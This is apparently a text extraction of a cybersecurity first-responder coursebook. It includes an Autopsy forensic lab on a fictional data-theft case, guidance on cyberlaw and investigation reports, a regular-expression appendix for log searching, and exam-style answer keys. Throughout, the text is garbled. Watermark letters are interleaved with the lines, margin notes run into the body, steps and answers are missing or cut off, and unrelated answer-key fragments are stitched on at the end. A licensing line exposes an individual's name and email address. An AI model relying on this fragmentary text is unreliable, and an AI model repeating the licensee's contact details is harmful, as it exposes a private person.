ot
N
2. Using the web browser, create a new case file for RupertCase.
a) Select the New Case button.
o
d) Leave the remaining field data at its default and select the Add Host button.
e
ut
ib
tr
is
D
or
e
at
lic
up
e) Select Next.
f) Under Image File Details, select the Add the following MD5 hash value for this image radio button.
g) Return to the open hash.txt file in Kali Linux that has the hash value.
D
h) Highlight the MD5 hash value (everything after the colon), then, from the Mousepad menu, select
Edit→Copy.
i) Paste the hash value into the text box back in Autopsy.
ot
N
o
D
e
ut
ib
tr
is
D
k) Select the Add button.
l) After the integrity check passes, select OK.
or
e
at
lic
up
D
e
ut
ib
The details for each file are shown in columns to the right of the file name. They include metadata
about when the file was last written/modified, when it was last accessed, when it was created, and
how large it is.
tr
The $FAT1, $FAT2, and $MBR entries refer to volume metadata, particularly file system data and
master boot record (MBR) data. Rupert's USB drive was formatted as FAT32. Everything else is
is
either a file or folder placed there by a user.
Also note that some file names are in red, indicating that they were deleted from this USB storage
D
drive. You can open the RUPERT drive from the desktop to verify that the file browser doesn't show
these files—only a forensic tool like Autopsy can recover them.
6.
or
Focusing on just the non-deleted files, what does this tell you about Rupert's
interests? Is there anything incriminating so far?
A: Rupert seems to be interested in video games, as the drive includes various files related to them.
That's obviously not incriminating by itself, but it may suggest that he was wasting company time
e
and resources if he was using this drive at work. More interestingly, the drive includes the
at
my_contract_invoice3.docx file that the CSIRT identified earlier as being correlated with Pat's
breached workstation. There's also a ZIP file with the somewhat suspicious name of nethack-360-
win-x86-2.zip.
lic
b) In the bottom pane, verify that Autopsy attempted to provide a preview of the file.
D
ot
N
o
D
Autopsy can't read DOCX files, but it does at least identify it as being a Microsoft Word 2007+ file.
You can see the raw data that Autopsy failed to parse. You could export this file and open it in a
word processing program, but ultimately, the details of Rupert's invoice aren't important; it's the
presence of the file that matters.
e
ut
ib
e) In the file download dialog box, ensure Open with Engrampa Archive Manager (default) is selected,
then select OK.
The ZIP archive opens in a file browser. There appears to be various file types, including dynamic
tr
link libraries (DLLs), executable files, and some text files. This is obviously some kind of program for
Microsoft Windows.
is
f) Double-click NetHack.txt to open it, then skim through the description.
D
8. What is this program? Is it incriminating?
A: NetHack is an old text-based dungeon crawler video game. Despite its name, it's not useful for
malicious purposes, so there's nothing really incriminating about it. Red herrings like this are
9.
always a possibility in forensic work.
Investigate the files that were deleted from the USB drive.
or
e
a) Close the text file and the file browser related to NetHack.
b) From the bottom left of the Autopsy web page, scroll down and select All Deleted Files.
at
lic
up
D
ot
c) Verify that you see a list of all of the deleted files and folders that Autopsy was able to recover.
N
o
D
10.Justby looking at the list of names, what can you tell about what was deleted
from this USB drive?
A: Several files and one folder were deleted. The folder is called DT_Watch_images, and the files
have various names, some of which appear incomplete. It may be possible to guess the contents
of some of the files based on their names and file extensions. For example, dt-
w1_product_specs.pdf is likely the product specification document for Develetech's smartwatch.
e
a) Focus on the files that end in JPG and PNG file extensions.
All of these files begin with $OrphanFiles in their names. Files are orphaned when their parent folder
ut
is deleted or otherwise unrecoverable. As you might have guessed, these files were inside the
DT_Watch_images folder when it was deleted.
b) Select the C:/$OrphanFiles/_MARTW~1.PNG file to open it in the bottom pane.
ib
c) Verify that Autopsy was able to recover the image and display a thumbnail preview of it.
tr
is
D
or
d) Select the View Full Size Image link to get a better look at the smartwatch processor schematic.
This is very likely the smartwatch_schematic3.png file that was logged in the anti-malware scan of
e
Pat's workstation.
at
e) Close the tab with the image to return to the directory analysis interface.
f) Back at the top of the file list, select the C:/accel_data_for_ml.csv link.
g) In the bottom pane, verify that Autopsy was able to open this comma-separated values (CSV) file.
lic
up
D
ot
N
This appears to be a dataset. There are rows and columns of data that track different human
activities like walking and running, as well as positioning data at certain timestamps. Develetech
may have been incorporating machine learning into its smartwatch product.
o
i) Select Export, then, with Open with Firefox selected in the dialog box, then OK.
j) Verify that you can see the product specification document for Develetech's smartwatch—the
LifeWatch.
e
ut
ib
tr
is
D
or
There's quite a bit of interesting information about the LifeWatch in this document, including its
physical specs, its operating system (Wear OS), its known issues, its testing results, and images of
the product. And, as the watermark and footer imply, it's all meant to be confidential.
e
k) Close the tab with the PDF to return to the directory analysis interface.
at
e
ut
ib
tr
is
D
or
This is programming code. It's written in Java, one of the languages used to write Android apps. You
can even see Android class declarations at the top of the file. Recall that the product specification
document listed Wear OS as LifeWatch's operating system; Wear OS is a version of Android for
wearable technology. This appears to be a beta version of LifeWatch's user interface app for Wear
OS.
e
p) Close the text file and the file browser related to the LifeWatchUI app.
at
If students choose to
withhold judgment, ask 12.How will using this tool help you in your case against Rupert?
them what other
lic
evidence they would A: It enables a detailed analysis of information from drive images and gives an investigator the ability
need to be convinced of to write notes about content and examine evidence without risking contamination of the original
Rupert's guilt. Use this evidence.
up
as a way to start a
discussion about the 13.Review all of the artifacts you identified and recovered from Rupert's USB
importance of critical drive. Examine them again in Autopsy if needed. Consider these artifacts in
thinking in forensic
light of what you already know about the events of the incident, as well as the
D
analysis.
fact that these are highly sensitive files that Rupert does not have
authorization to view, much less copy off the server.
ot
Considering all of your work so far, how confident are you of Rupert's
involvement in the incident?
N
A: Answers will vary. Some will think the evidence is overwhelmingly suggesting that Rupert
attempted to steal sensitive data from the company and then cover his tracks. Others may hold
out on committing to a final judgment, and will want to see if there is any more evidence that could
o
e
A: Answers will vary, but assuming his coworkers' testimony is accurate, Rupert was likely intending
to sabotage Develetech, either by giving away its secrets or by selling those secrets to a
ut
competitor.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC C
Follow Up on the Results of an Investigation
No job is done until the paperwork is complete. After you've completed the investigation, you'll
need to document your findings in a way that meets with applicable rules, regulations, and laws.
You'll also need to follow up to ensure that your organization is protected from a recurrence of such
e
an incident.
ut
Cyberlaw
ib
Cyberlaw Cyberlaw governs the behavior of individuals and groups in the use of computers, the Internet, and
other IT domains. As with other aspects of the law, the definition and makeup of cyberlaw will vary
from state to state and nation to nation. In general, governments that enact and enforce cyberlaws
tr
extend legal protection to victims of computer-related crimes, while punishing the perpetrators of
these crimes.
is
In the event your organization is the victim of a security breach or other incident, you may be called
on to present evidence in court or act as an expert witness. Even if you are not directly involved in
D
court proceedings, you may be asked to assemble and prepare evidence for a judge. This is why, as a
forensic analyst, you should be aware of the cyberlaws that govern your particular jurisdiction.
Knowing which laws were broken can help you contextualize your reports in a legal sense, rather
or
than simply dumping all of your collection and analysis efforts into a single, uncoordinated pile of
evidence. Legal counsel can help you interpret the law, but it may be up to you to bridge the gap
between the technical aspects of evidence and the legal ramifications.
e
Keep in mind that not all incidents are legal matters, be it because the incident is not covered under
the law or because the victim organization chooses not to press charges.
at
Note: Most states have passed their own cyberlaws beyond those of the federal government.
lic
Example
up
An example of a cyberlaw is the U.S. Computer Fraud and Abuse Act (CFAA). This law
prohibits users from accessing computer systems without authorization and, as a result, obtaining
sensitive information like financial records, government records, or any information from a
computer with a protected status. Protected computers are defined as computers that are used by
D
financial and government institutions, as well as computers used in interstate and foreign commerce.
Note: For the full text of the CFAA, navigate to https://www.law.cornell.edu/uscode/
ot
text/18/1030.
N
Cyberlaw Internationally
Cyberlaw can vary significantly depending on the jurisdiction, especially in different countries and
regions. What constitutes a cybercrime in the United States may not be the same in Germany, Japan,
o
Australia, etc. Although you may not think you're subject to any laws other than the ones in your
organization's home country, consider how widespread and distributed information is today. If your
D
business is headquartered in New York, and you hire a cloud storage firm in London that distributes
your data to servers around the world, what are the legal ramifications in the event of a breach? It's
very likely that your legal case will be subject to the jurisdiction of several foreign nations, not just
your own. It may not be enough to know your own country's laws, so you may need to know the
laws of the countries that govern where your data is stored.
e
often have a threshold for interest in an investigation. If your presumed losses barely surpass a few
ut
thousand dollars, some agencies may not even bother taking on the investigation. Likewise, smaller,
local agencies may be ill equipped, both in staff and technology, to assist in your investigation.
It's also important to understand that law enforcement should not be expected to do all of the work
ib
in an investigation. As a liaison or technical expert, you need to share pertinent evidence with
authorities without overburdening them with trivial information. You should find out exactly what
they need from you—and communicate exactly what you need from them—to ensure a smooth
tr
transition. For example, you may need to share your hashed drive images with the authorities, as
well as explain their contents and how they may contain evidence of an intrusion. On the other
is
hand, the authorities may possess forensic tools and techniques that go beyond your own
capabilities. These might be of great benefit to your investigation.
D
Documentation of Investigation Results
or
While some forensic tools may have reporting capabilities built in, this is often insufficient to
present as an official report to a wider audience. Tool-assisted reports can be overly technical and
fail to get to the point. That's why you should consider manually writing your reports based on the
Documentation of
Investigation Results
e
results of your investigation. To be effective, these reports must answer the following questions:
• Who tasked you with the investigation?
at
Use this question to remind yourself who asked you to begin this investigation to establish a clear
authority. As mentioned before, investigations are not guaranteed to be quick; on the contrary,
lic
many are very slow to progress. Without a record, you may forget. This is especially true if
personnel changes in the interim or if the company is part of a merger or another change in
ownership.
up
(such as workstations, network appliances, etc.) and people (such as witnesses, suspects, etc.). It
is very important that your record of these objects is comprehensive. Instead of simply stating
you reviewed "an employee's workstation," you should instead say: "A Dell Inspiron laptop with
N
serial number 12345 running Windows 10, assigned to Aaron Jones on November 21st, 2020 by
the company."
o
can include technical processes like capturing system images and taking hashes, and it can also
include more operational processes like maintaining the chain of custody by placing evidence in
secure, labeled containers.
• What did you find?
You must record all significant events, files, images, machines, testimony, and so on, that are
relevant to the investigation. This report is not just to help you remember, but will also likely
need to be geared toward an audience, like a boss or the arbiter(s) of the court case. That's why
you need to write plainly and practically, and avoid using jargon. For example: "The login records
show that a user was signed in under the account A. Jones while the incident took place."
• What does it all mean?
This last question prompts you to piece all of your findings together to offer a conclusion. What
do you believe happened, how did it happen, and who do you think is responsible? You cannot
necessarily rely on the audience of this report to draw their own conclusions; they'll likely be
looking for you to do that, so they can verify the validity of those conclusions. Although these
conclusions may be subject to bias, if you support them with evidence, the arbiter(s) of the case
will be more inclined to agree.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 11-4
Conducting Post-Mortem Activities
Scenario
e
The investigation is nearing its conclusion, and the evidence points to Rupert as the culprit. The
company has terminated his employment as of today. Although you've identified who caused the
ut
incident and how, your work is not over. You still need to write a report of your findings, as well as
prepare to be involved in a criminal investigation. It's up to you to maximize the usefulness of these
ib
follow-up tasks for the benefit of the company and its continued security.
Activity: Conducting
Post-Mortem Activities
tr
1. Autopsy offers tool-assisted reporting for your investigation, but you need to Consider using this
activity as an opportunity
tailor a report to a wider audience that includes upper management.
is
for students to actually
write a forensic report.
Based on your findings of the data breach incident, what would you include in Otherwise, have them
D
this report? share their ideas with
A: Answers will vary. A useful report includes the following information: who authorized the the class about how the
investigation, the focus of the investigation, the specific people and systems you investigated, report should be written.
or
what you found, and how it all comes together. For the data breach incident, you may choose to
begin the report by stating that you were authorized to perform the investigation by the CISO of
Develetech, and that you were tasked with finding out what data was breached and who was
responsible. The assets that the team investigated were: Pat's workstation, the system and anti-
e
malware logs on that workstation, the research and development server, the system and network
logs of that server, the network logs of various other devices, the people who were indirectly
at
affected by the incident (Charles and the help desk employee), one of the victims (Pat), and the
primary suspect (Rupert). What you found is evidence of a failed remote login attempt, evidence
of a remote connection from inside the network using certain credentials (Pat's), network logs
lic
supporting these connection attempts, host and anti-malware logs indicating that sensitive files
were transferred off the research and development server, the USB drive with those files on them,
and more. You could then likely end with a way to pull it all together, constructing a single
narrative of events as implied by the evidence you found. This narrative should go step-by-step
up
and explain how Rupert breached the server, why he did so, and what he might have done with
this stolen data.
D
2. Based on your thorough report, management has decided to work with legal
counsel to determine if any criminal charges can or should be filed.
ot
A: Answers may vary, but a forensic investigator should research the laws that govern the
organization, including specifically which laws may have been broken as a result of the data
breach. If legal counsel advises the company to press charges, you can further tailor your report
to speak to the applicable laws. For example, some laws will place greater value on certain types
o
of evidence, so you'll want to make sure the report focuses on that evidence so that it clearly
illustrates how the law was broken.
D
3. After consulting with its attorneys, the executives at Develetech have decided
to press charges against Rupert. The company believes its intellectual
property and trade secrets have been stolen for financial gain, which is a
violation of the Economic Espionage Act of 1996. In the trial preparation
phase, you will be a law enforcement liaison.
How would you suggest collaborating with this non-technical audience?
A: Answers will vary. It's important that the liaison clearly understands what law enforcement officials
e
expect of them, and likewise, communicates what they expect of the officials. This will enable you
to exchange information and evidence without issue. Also, you shouldn't expect that local law
ut
enforcement will provide a comprehensive level of assistance to your investigation; you may need
to do most of the remaining work internally. Still, some agencies (particularly federal ones) may
have tools at their disposal that you do not. You should take advantage of these tools wherever
ib
possible.
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
Summary
In this lesson, you switched roles from the first responder to that of a forensic investigator. You
created a forensic investigation plan, collected evidence, and reconstructed the incident to determine
how the incident was carried out and the motives behind it. You also implemented post-
investigation measures that included documenting the investigation and preparing for legal action.
Encourage students to
From your experience, share a cybersecurity incident that warranted a forensic
e
use the social
investigation. networking tools
ut
A: Answers will vary. Be prepared to offer an example of a cybersecurity incident that escalated into an provided on the CHOICE
investigation. If necessary, you can use an incident from recent real-world events. Course screen to follow
up with their peers after
ib
What evidence preservation techniques are most commonly implemented in the course is completed
your organization or an organization you're familiar with? for further discussion
and resources to support
A: Answers will vary. Some students may have experience with physical techniques like placing
tr
continued learning.
compromised hardware in lockers or access-controlled rooms. They may also be familiar with
evidence bags with labels that help track the chain of custody. For virtual assets, students may be
is
familiar with the process of capturing system images and placing them in secure virtual locations, as
well as employing encryption to keep the data confidential.
D
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
e
at
lic
up
D
ot
N
o
D
Course Follow-Up
Congratulations! You have completed the CyberSec First Responder® (Exam CFR-410) course. You
have gained the practical skills and information you will need to manage risk, analyze threats and
attacks, protect the organization's security, collect and analyze cybersecurity intelligence, and
respond to and investigate incidents. All of these skills combined will help you proactively defend
your organization against the many threats it faces every day.
You've also gained the knowledge you will need to prepare for the CyberSec First Responder®
e
(Exam CFR-410) certification examination. If you combine this class experience with review, private
study, and hands-on experience, you will be well prepared to demonstrate your security expertise
ut
both through professional certification and with solid technical competence on the job.
What's Next?
ib
Your next step after completing this course will probably be to prepare for and obtain your
CyberSec First Responder certification. In addition, there are a number of advanced and specialized
tr
security courses and certifications that you might want to pursue following this course. The Logical
Operations course Certified Information Systems Security Professional (CISSP®): Sixth Edition will expand
is
on your knowledge of information security to apply more advanced principles to maintain security
in complex enterprise environments. The Certified Cyber Secure Coder® (Exam CSC-210) course will
provide you with the skills to develop applications that incorporate security principles throughout
D
the entire development lifecycle. To learn more about artificial intelligence (AI) and machine
learning concepts that are used in cybersecurity solutions like SIEMs and EDR, consider taking the
or
Certified Artificial Intelligence (AI) Practitioner (Exam AIP-110) course. There are also many vendor-
specific courses available that include material on securing various computing systems.
You are encouraged to explore computer and network security further by actively participating in
any of the social media forums set up by your instructor or training administrator through the
e
Social Media tile on the CHOICE Course screen.
at
lic
up
D
ot
N
o
D
Course Follow up
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
e
ut
Responder® (Exam
ib
CFR-410)
tr
is
Obtaining CyberSec First Responder® certification requires candidates to pass the exam
D
CyberSec First Responder® (Exam CFR-410).
To assist you in your preparation for the exam, CertNexus has provided a reference
or
document that indicates where the exam objectives are covered in the CertNexus CyberSec
First Responder® (Exam CFR-410) courseware.
The exam-mapping document is available from the Course page on CHOICE. Log on to
your CHOICE account, select the tile for this course, select the Files tile, and download
e
and unzip the course files. The mapping reference will be in a subfolder named Mappings.
at
e
ut
ib
Appendix Introduction
tr
The following appendix provides an overview of regular expressions and how they may be
is
useful to your log analysis efforts.
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC A
Parse Log Files with Regular Expressions
Whether you're using command-line tools or graphical security information and event management
(SIEMs), knowing how to craft a truly specialized search pattern is essential. In this topic, you'll use
regular expressions to home in on the exact data you're looking for out of your logs.
e
ut
Regular Expressions
Regular Expressions A regular expression (regex/regexp) is a group of characters that describe how to execute a
ib
Regular expressions can specific search pattern on a given text. Regular expressions are a much more powerful way to search
be a difficult concept for for specific strings in a text than standard string searches. Search operations using regular
students to grasp. expressions use a common syntax, which includes various special characters that have specific uses.
tr
Throughout this topic, This results in the search being able to retrieve granular results that it would otherwise not be able
assure them that the to.
is
expressions don't
necessarily need to be Consider the following dilemma: you have a log file, and you want to find a useful delimiter in this
perfect—as long as you log file to cut on. In many log files, information types are separated by some form of punctuation,
D
find what you're looking like colons, commas, periods, semicolons, etc. In the particular log file you're looking at, you know
for while avoiding false that each information type also has a space after the punctuation. So, how would you use a normal
positives. search string to find all of the punctuation in the log file that has a space after it? Simply using a
or
space (" ") as a search string won't work, because it'll also include spaces between words. You could
start writing a search string such as: ". " AND ": " AND ", " and so on until you've accounted
for every possible punctuation mark, but this will end up making the search string verbose.
e
Now consider the following regular expression:
at
\W\s
It may not be immediately obvious, but this short string will return every instance of a non-word
that is followed by a whitespace character. In regular expressions, a non-word is anything that is not
lic
a letter, number, or underscore. So, every punctuation mark followed by a space is covered by this
one expression. This is only a simple example of the potential power behind regular expressions.
up
libraries is mostly the same; the differences typically center on the logic, restraints, and capabilities of
each library.
ot
Search Operators
N
Quantification Operators The syntax for regular expressions behaves in similar ways to normal search strings. Searches are
read from left to right, and can include any normal, unformatted characters. What separates regular
expressions from their normal search counterparts is that they can include many different search
o
operators that are not read directly, but interpreted. These search operators provide you with the
ability to match repetitions in a pattern, limit the extent of that pattern, or configure your search in
D
* Matches zero or more instances of the 105* matches the "10" in "104", the
preceding character. "105" in "1052", and the "1055" in
"1055".
? Matches zero or one instance of the 105? matches the "10" in "104" and
preceding character. the "105" in "1052".
+ Matches one or more instances of the 105+ matches the "105" in "1052"
e
preceding character. and the "1055" in "1055".
ut
{n} Matches only n instance(s) of the 105{3} matches "10555".
preceding character.
{n,} Matches at least n instance(s) of the 105{1,} matches "105", "1055",
ib
preceding character. "10555", and so on.
{n,m} Matches between n and m instances of the 105{1,3} matches "105", "1055",
tr
preceding character (inclusive). and "10555".
is
Search operators in this next category are called anchors, as they prompt the search to match a Anchor Operators
specific location within the text.
D
Operator Description Example
^ Matches the position at the beginning of ^105 does not match "2105".
$
the following string.
Matches the position at the end of the
following string.
or
105$ does not match "1052".
e
at
The next category concerns character sets, which enable you to define a wide range of characters to Character Set Operators
match all at once.
lic
[ ... ] Matches any character within the set. The [0123456789] matches every
set is contained in the brackets. character in "1055". Likewise,
up
^ Inside brackets, this negates a set. [^0123] matches the "5" in "105".
Matches any characters or range of Likewise, [^a-f] matches the "s",
characters not in the set. "u", "r", "i", "t", and "y" in "security".
N
This last category contains miscellaneous search operators you can include in your regular Miscellaneous Search
expressions. Operators
o
. Matches any character except for line 105. matches "1055", "1056",
breaks. "1057", and so on.
( ... ) Defines a subexpression with the pattern ([0-9]abc){2} matches
inside the parentheses. "5abc5abc". Without the parentheses
it matches "5abcc".
e
the "$" in "$1055". Note that by
escaping the character, it does not
ut
perform its regular expression
function (anchoring the end of a
string).
ib
AWK-Specific Operators
tr
The AWK programming language contains a few extra operators that can be used alongside regular
expressions. These operators can be used for comparison or combination purposes. For example:
is
• ~ returns true if a field or expression (left operand) matches a regular expression (right operand).
For example: awk "$1 ~ /105+/" file.txt checks if the first field in a text file matches the
D
regular expression enclosed in slashes.
• && combines two regular expressions. For example: awk "/105+/ && /abc/" file.txt will
return lines from a file that match both regular expressions enclosed in slashes.
or
• ! checks if a regular expression is not present. For example: awk "! /105+/" file.txt returns
lines from a file that do not match the regular expression enclosed in slashes.
e
Special Operators
at
Special Operators Regular expression languages also include special operators that perform a variety of different
functions in an expression. All of these special operators are preceded by a slash character so they
lic
\w Matches a word. Words are defined as any 105\w matches "105a" and "1055".
letter, digit, or underscore.
\W Matches a non-word. 105\W matches "105!".
D
character.
\S Matches any non-whitespace. 105\S matches "1055", "105a",
"105!", and so on.
o
boundaries are defined as one side being but does not match the "105" in
any non-whitespace character, and the "21052".
other side being a whitespace character.
\B Matches a non-word boundary. 105\B matches the "105" in "21052"
but does not match the "105" in
"22105".
Modifiers
Regular expressions can also be used with modifiers, which alter the behavior of the expression in
some way. They are typically placed at the end of the expression to modify the whole thing, but
e
some may also be placed inline to modify only part of the expression. The following are common
ut
modifiers:
• i ignores case sensitivity. Regular expressions are case sensitive by default.
• g is a global modifier that finds all matches rather than stopping after the first match.
ib
• m turns on multi-line mode, which forces anchors to match the beginning or end of each line,
rather than each string.
tr
• s turns on single-line mode, which forces the . operator to match line break characters.
is
Build an Expression
D
Writing a good regular expression can be difficult, so often the best tactic to take is to build one out Build an Expression
piece by piece. Consider using these
In this example, you want to search your logs for any entries that contain an IP address range that questions and the build
you know to be malicious—188.24.122.0/24.
or
In order to start building any regular expression, there are some questions you should ask:
• What are the commonalities that are shared by all instances of the thing I'm searching for?
process on another,
more complex
expression, like a search
for all IP addresses.
e
• In the example, all IP addresses start with a number from 0 to 255, then include a period,
at
• In the example, the first three octets of the IP address are static—it's the last octet that will
change.
• Do I need to escape any characters that are used as operators?
up
• In the example, the periods between the octets don't change. However, the period is also a
regular expression operator, so it needs to be escaped.
• Does the expression need to be perfect? Is it "good enough"?
D
• IP octets stop at 255, but what are the chances that your logs include an invalid octet? In the
example, you don't necessarily need to limit the last octet to only numbers from 0 to 255—
any one to three digits should suffice.
ot
So, after answering these questions, you can begin to build the expression. The process can go Inform students that
something like this: sometimes building an
N
e
ut
ib
tr
is
D
or
e
at
Types of Searches
Keyword Searches How you use regular expressions will depend on what type of information you're looking for in your
up
Consider having log files. Because most logs share a common set of information, some expressions in particular will
students test these be of great use to you. You might easily find yourself using these expressions over and over
regular expressions at throughout the course of your duties, and you may even want to tweak the expressions so they are
https://regex101.com. more applicable in certain contexts. The following are examples of regular expressions germane to
D
This list of search types log analysis. Each part of the text that matches the example expression is underlined.
is best used as a
reference. If you choose Keyword Searches
ot
activity. example, you only want to show errors that were logged on one specific day. You can also use
keyword searches to search for keywords you've extrapolated from others. For example, if you've
identified malware that always calls its executable files malice123.exe, then you'll want to search
o
your system log for all executable file types (.bin, .exe, .bat, etc.) that have the malice123 name.
Examples:
D
• error/i
Use to: Search for errors in a log (case insensitive).
Match example: "Application Error: Forcing Restart"
• malice123\.\w{1,4}
Use to: Search for all files named "malice123" that have a standard file extension length.
e
• (([01]\d)|(2[0-3]))(:[0-5]\d){2}
Use to: Search for times in the format HH:MM:SS (24-hour clock).
ut
Match example: "02/24/2016 14:23:56 Audit Failure"
Special Character
ib
Special Character Searches Searches
Searching for special characters can help you quickly identify elements like encoded URLs and even
tr
other regular expression searches that are recorded in application, server, and client logs. The key to
conducting most special character searches is to remember the importance of escaping characters to
is
create literals.
Examples:
D
• (http|https):\/\/.*\.[a-z]{2,4}\/.*\?.*
Use to: Search for URLs that pass in query strings.
• \{\d\,\d\}|\[\d\-\d\] or
Match example: "GET request denied: https://develetech.com/signin?var1=user&var2=pass"
Use to: Search a terminal log for entries that indicate a regular expression was performed.
e
Match example: "awk '/Feb\s1[0-5]/ && /10\.39\.5\.\d{1,3}/ syslog.txt'"
at
IP Address Searches
IP Address Searches
lic
Searching for IP addresses can help you easily find all log entries for a known malicious source or
destination. It can also help you discover the details of an attack performed against a server or other
host in your network.
up
Examples:
• 188\.24\.122\.\d{1,3}
Use to: Search for all logged IP addresses in the known malicious subnet 188.24.122.0/24.
D
Use to: Search for all possible IP addresses (including some invalid ones) in a log.
Match example: "Source: 10.39.5.10 , Destination: 10.39.5.100"
• (19[2-9](\.\d{1,3}){3})|(2[0-2][0-3](\.\d{1,3}){3})
N
Use to: Search for all logged Class C IP addresses in range 192.x.x.x to 199.x.x.x.
Match example: "Source: 188.24.122.23 , Destination: 192.168.10.23"
o
• ([1-9]\d{0,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])
Use to: Search for all possible port numbers in a log.
Match example: "ALLOW 1701 vpn.develetech.com"
• (49[2-9]\d{2}|491[6-9]\d|4915[2-9]|5\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|
655[0-2]\d|6553[0-5])
Use to: Search a log for only port numbers in the dynamic and private range.
Match example: "src = 10.39.5.10 , dst = 10.39.5.50 , port = 55166"
e
• ([1-9][0-9]{0,2}|10[01]\d|102[0-3])
Use to: Search a log for only port numbers in the well-known range.
ut
Match example: "src = client00 , dst = https://www.develetech.com , port = 443"
ib
Guidelines for Writing Regular Expressions
tr
Guidelines for Writing
Regular Expressions Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.
is
Use the following guidelines when writing regular expressions.
D
Write Regular Expressions
When writing regular expressions:
• Know the various search operators, special operators, and modifiers common to most regular
e
expression libraries.
• Keep a reference card or other cheat sheet close by in case you forget what an operator or
at
modifier does.
• Use quantification operators to repeat a character or group multiple times.
lic
sensitivity).
ot
N
o
D
ACTIVITY B-1
Parsing Log Files with Regular Expressions
Scenario
e
Analyzing logs with your SIEM has proven to be useful, but you'd still like a more sophisticated way
to parse these log files. So, you'll start writing regular expressions to get a more fine-tuned look at
ut
your data. Regular expressions will enhance your log analysis capabilities, and can even be applied in
many other search scenarios.
ib
Activity: Parsing Log
Files with Regular
1. To test out your ability to write regular expressions, you should start with a Expressions
tr
Throughout this activity,
simple example. A U.S. ZIP code, for instance, is five digits long, and can (for point students back to
the most part) include any digit in any of the five positions.
is
the material in this topic
when they need help
How would you write a regular expression to capture all possible ZIP codes? remembering symbols
D
A: The simplest way to write this expression is \d{5}—this searches for any combination of five and expression syntax.
digits. Consider having
students test their
2.
location. The format of extended ZIP codes is #####-####.
or
ZIP codes can also have a four-digit extension to further narrow down a
regular expressions at
https://regex101.com.
Consider stepping
through each component
e
How would you write a regular expression to capture all of these extended of each regular
ZIP codes? expression. This can
at
3. There are times when you don't know the exact format of something, or you and how the whole
want to capture multiple formats. expression comes
together.
up
In the ZIP code example, what if you wanted to capture all possible five-digit
ZIP codes or any extended ZIP codes?
A: You can use the "OR" logical operator to do this. The expression could be something like \d{5}-
D
\d{4}|\d{5}—this basically combines the two previous expressions using the pipe symbol to
indicate an alternative.
ot
4. You want to search your logs for any event that includes an error or failure
message.
N
In the following space, write a regular expression that searches for these
messages, regardless of capitalization.
o
5. You also want to search for any log entries that include any email address.
Before you begin building your expression, answer these important questions.
What do all email addresses share in common? What, if anything, can remain
static in this expression? What characters will you need to escape? Does the
expression need to be perfect?
A: All email addresses are in the basic format localname@domain.tld. The length and specific
character requirements may vary; for example, top-level domains are generally not longer than
e
four characters, the entire address is usually not allowed to be over 255 characters, and some
systems do not allow certain special characters. Still, the @ symbol and the period are always
ut
going to be in an email address. Beyond this, nothing is really static, as you're trying to search for
all possible addresses. The only real character you need to escape is the period before the top-
level domain. The expression doesn't need to be perfect, and you may not even need to pay
ib
attention to character limits in the local name and domain sections.
6. In the following space, write out your regular expression to capture everything
tr
in an email address format.
is
A: A basic example is .+@.+\.[a-z]{2,4}—this works for most email addresses, but may not
include some of the latest top-level domain suffixes.
D
7. Write a regular expression that will capture all possible IP addresses.
Remember, your expressions don't need to be perfect to be functional.
or
A: A basic example is (\d{1,3}\.){3}\d{1,3}—though this example would allow illegal IP
addresses (greater than 255 for an octet, for example). This may be good enough for your
purposes, however, as you are unlikely to encounter invalid IP addresses in your logs.
e
8. When would you use regular expressions rather than normal searches in
logs?
at
A: Answers will vary, but may include searching for any string that you know only part of; version
numbers; timestamps; IP addresses; port numbers; user names; and more.
lic
up
D
ot
N
o
D
e
ut
ib
ACTIVITY 1-1: Identifying the Importance of Risk
tr
Management
is
1. Why would these changes necessitate the re-evaluation of a risk
D
management strategy?
A: Answers will vary, but significant changes can bring about risk in many different ways. It may
become more challenging to secure sensitive information and keep it out of unauthorized
or
hands, or it may simply require more resources to secure more at-risk areas. Managing risk to
information and systems will help your organization avoid legal and financial disasters.
Additionally, there will be pressure from stakeholders, customers, and regulatory entities to
conform to their expectations and meet standardization requirements. There is also the chance
e
that an increase in the amount of communications in the organization will exponentially
increase the amount of risk that these communication channels take on. You need to make
at
What are the specific types of risk that could affect Develetech as it
lic
2.
expands its business?
A: Answers will vary, as there are many potential risks. Additional offices and warehouses will
up
operations into a foreign country, may create legality issues for the organization. Financially, a
security breach could cost the organization a great deal, and its reputation may suffer as a
result. There may also be potential issues with the supply chain, which can have operational
ot
there is not necessarily an objectively right answer. Quantitative analysis tends to be more
precise, but it's also expensive and not always feasible; qualitative analysis tends to be faster
D
and cheaper, but it's not always useful. Semi-quantitative analysis may be able to leverage the
strengths of both while minimizing their weaknesses. In any case, you may need more
information about a situation before the best approach becomes obvious.
e
2. How will both internal and external compliance factors influence
ut
your risk assessment?
A: Answers may vary. Your internal staff needs to comply with your risk management
ib
plan once it has been put in place. This usually means training certain staff is required;
otherwise, they might not be properly equipped to meet compliance requirements.
Because internal users access your systems constantly, they can bring a great deal of
tr
risk. Externally, your organization must comply with all applicable laws and regulations.
Even failure to comply with non-legally binding, industry-accepted standards may place
is
your organization's finances or reputation in jeopardy. However, external compliance will
not guarantee security. You may find that your risk is still too high even though you
adhere to security requirements.
D
3. What is the annual loss expectancy (ALE) for a flood damaging the
warehouse?
○ $800,000
◉ $200,000
or
○ $5,000,000
e
○ $20,000,000
at
lic
1. What controls can you implement to round out your risk mitigation
strategy and uphold the components of the CIA triad?
A: Answers will vary, but a strong way to secure confidentiality is through encryption.
D
Encrypting the database will deter unauthorized users from making sense of the stored
data. You could also implement access control to prevent an intrusion before it even
begins. This will keep your databases out of the hands of an attacker. In addition, you can
ot
implement physical security measures in case an attacker has in-person access to these
databases.
N
A: Answers will vary, but you should ask how easily exploitable the flaw is, and what the
scope of an exploit could be. Can an exploit expose confidential information? Can it crash
D
the app or otherwise render other systems unavailable? What attack vectors exist that
